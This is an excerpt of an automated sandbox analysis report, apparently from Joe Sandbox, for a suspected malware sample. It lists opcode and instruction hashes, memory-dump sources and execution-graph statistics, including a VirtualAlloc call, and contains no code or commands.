                                                                                                  • Opcode Fuzzy Hash: 073be99251e7dbbd6c836e334987c96df42bb119f2bc1db64012bca0175501d4
                                                                                                  • Instruction Fuzzy Hash: E1011E7090968D8FCF85EF68C8546EA7BB1FF65300F05059AE419C71A1DB759A54CB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3da538bc518b439c8e58bdf11904baf94d726b53f7bdeec317d7dde38169cf14
                                                                                                  • Instruction ID: 5ce7211e7b592a17f1982eaa66043460d2697a232e20cd21c5cc54ca42d1f9fa
                                                                                                  • Opcode Fuzzy Hash: 3da538bc518b439c8e58bdf11904baf94d726b53f7bdeec317d7dde38169cf14
                                                                                                  • Instruction Fuzzy Hash: 0B012C3050968C8FCB45DF64C868AE97FB0EF6A300F0501DAD449C71A2C7759A94CB41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5ead5db72ea46fd23275a21dff51708c89da3c9ec213f7edbad2ba33ad6c1c28
                                                                                                  • Instruction ID: 6d19faefebd10147228a1eb1ba3ef0f9bba114754467c4cdc049b39a4da02463
                                                                                                  • Opcode Fuzzy Hash: 5ead5db72ea46fd23275a21dff51708c89da3c9ec213f7edbad2ba33ad6c1c28
                                                                                                  • Instruction Fuzzy Hash: CC017C7190978C8FCB85DF64C8A4A997FB0FF69300F0540DAE408C71A2D734D994CB41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3773598518902191c0563c70a36c32b9a9c6f76d198a68fd0002b02771ecff35
                                                                                                  • Instruction ID: e8d347b0952a918b0fa34a501eaae724a1b4d4e82be282c8d480915e0ff33ff3
                                                                                                  • Opcode Fuzzy Hash: 3773598518902191c0563c70a36c32b9a9c6f76d198a68fd0002b02771ecff35
                                                                                                  • Instruction Fuzzy Hash: EA018F71A0968DCFCB85DF68C8646ED7BB0FF25300F0505AEE419C72A2DB349904CB41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: be239744877f8e7ce3c0992ea465a1ef03acd4da4afcc5d9c6f3466c96edd378
                                                                                                  • Instruction ID: 092bba3eee5e722ca4d5530caf3377c3efd2d4c8e8591e835cbc1481ae6ce207
                                                                                                  • Opcode Fuzzy Hash: be239744877f8e7ce3c0992ea465a1ef03acd4da4afcc5d9c6f3466c96edd378
                                                                                                  • Instruction Fuzzy Hash: BCF0B471E1A74DDFEB51ABB4886A6E97FA0FF25300F0A45B7E44CC20E2DD3856848701
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba2b000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 94cf208f74e6a6c515196b3c35064f61e62864c5a286d07de5696d1b8ec7492b
                                                                                                  • Instruction ID: 9a7691662c24bdab7d498e0fc9d48943885115ae0ab618e80f59efaccb7c2cf9
                                                                                                  • Opcode Fuzzy Hash: 94cf208f74e6a6c515196b3c35064f61e62864c5a286d07de5696d1b8ec7492b
                                                                                                  • Instruction Fuzzy Hash: AA011931A1890D8FDF94EF58C8A5ABE77A1FF64344F110069E419D32A1DA74EA55CB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 678928b821ac35366c8fd77c396d2577d3aab7bd6ccbe8c7ce0703928505724f
                                                                                                  • Instruction ID: d5bdeeac97abde1ab8e07dc6a947662f7ed674c27fa10c8432b0734f2ba2a745
                                                                                                  • Opcode Fuzzy Hash: 678928b821ac35366c8fd77c396d2577d3aab7bd6ccbe8c7ce0703928505724f
                                                                                                  • Instruction Fuzzy Hash: 9DF0C930914A4D9FCF44EF58C859AEA7BF0FB68305F01056AA85AD3250DB30A694CB81
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba2b000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: af3d293699e5bd6f5bf79211d4e78c76232b74542a2c665fc3820f8bb11412dc
                                                                                                  • Instruction ID: b1d8b214886e20cee7c4f6ba94beaafd125e330fb9933f21d21a0fcd763585f7
                                                                                                  • Opcode Fuzzy Hash: af3d293699e5bd6f5bf79211d4e78c76232b74542a2c665fc3820f8bb11412dc
                                                                                                  • Instruction Fuzzy Hash: 5D014B71B08A0E8BEB28DF94C865ABD77B1FB54304F10023EC416D72A5CBB42A058B44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b3dc2bb358152b21ab37a885fbf3b957e59177f3933248fbd0e962df7b36262b
                                                                                                  • Instruction ID: 2d5b1a4fa7b60a2c7ce71a9d0a7261827ec74115969507ecfeb52b70b732c741
                                                                                                  • Opcode Fuzzy Hash: b3dc2bb358152b21ab37a885fbf3b957e59177f3933248fbd0e962df7b36262b
                                                                                                  • Instruction Fuzzy Hash: E6F0BE3099A78C8FEB90EF68C8696ED7FA0FF14300F0501AAE808C60A2DB7496948741
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dfc30cc530566b3173c43b00a56d0a7518960cc55106cbd8875dff7eebc79d44
                                                                                                  • Instruction ID: 6afe43896fac8672cfcfb9ea7af9d0f816c2b16b1eee9fd0a3a5e8de180cd9bb
                                                                                                  • Opcode Fuzzy Hash: dfc30cc530566b3173c43b00a56d0a7518960cc55106cbd8875dff7eebc79d44
                                                                                                  • Instruction Fuzzy Hash: 13F0903150A68D8FDF95EF18C855A993BA0FF29300F0501A6E458C7161D774EDA0CB81
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 34badbd0fedea229b69ffce8e5bad66b68a57dbc683c7223a09e0788d612b4b3
                                                                                                  • Instruction ID: 39f3fe47517d7c4e8554cc7e477acad3a0eea2a685e79f5a0fbf074be8d100b3
                                                                                                  • Opcode Fuzzy Hash: 34badbd0fedea229b69ffce8e5bad66b68a57dbc683c7223a09e0788d612b4b3
                                                                                                  • Instruction Fuzzy Hash: 24F0B77091490D9FDF84EF68C459AAA7BF1FB68305F1041AAA41DD32A0DB71A6A4CB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 02aa7748c978de13aef4cd104935aa6233602f0721b9fbf1f8394728b365870f
                                                                                                  • Instruction ID: 6ae0cb3a08f71f3f8cc237e0f6c7f3404895f6c9cb3a0ea6e85a186322200bac
                                                                                                  • Opcode Fuzzy Hash: 02aa7748c978de13aef4cd104935aa6233602f0721b9fbf1f8394728b365870f
                                                                                                  • Instruction Fuzzy Hash: A9F0F930904A0D9FCB94EF54C854AAA7BA0FF68304F1040AAE419D3260CB71A694CB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba2b000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1cd98a4eebf0c342191fceda7e5bc464835eb4841a3abf53ef297713d026ae9c
                                                                                                  • Instruction ID: 31074958f557d9d2ccc587ee111a1ca9b82156bc36e16ce55c1d95bbf7d95140
                                                                                                  • Opcode Fuzzy Hash: 1cd98a4eebf0c342191fceda7e5bc464835eb4841a3abf53ef297713d026ae9c
                                                                                                  • Instruction Fuzzy Hash: 2A014F30F0860E8BEB28DF94C8616BDB7B1FF40304F11063FC416972A1CBB85A018B44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 483e0d329ec587f5fd3e9039a3259d0f62e5e6e82fd1281a201be268f274d7e5

Execution Graph

Execution Coverage: 10.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 7
Total number of Limit Nodes: 0
execution_graph 6381 7ffd9b9f72ba 6382 7ffd9b9f72c7 6381->6382 6385 7ffd9b9f0750 6382->6385 6384 7ffd9b9f17da 6385->6384 6386 7ffd9ba03940 6385->6386 6387 7ffd9ba03c9d VirtualAlloc 6386->6387 6388 7ffd9ba03cf5 6387->6388 6388->6384

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 16 7ffd9b9f070d-7ffd9b9f074f
APIs
Memory Dump Source
• Source File: 00000025.00000002.2822400102.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_7ffd9b9f0000_uAsLgsGzSk.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000025.00000002.2822400102.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_7ffd9b9f0000_uAsLgsGzSk.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0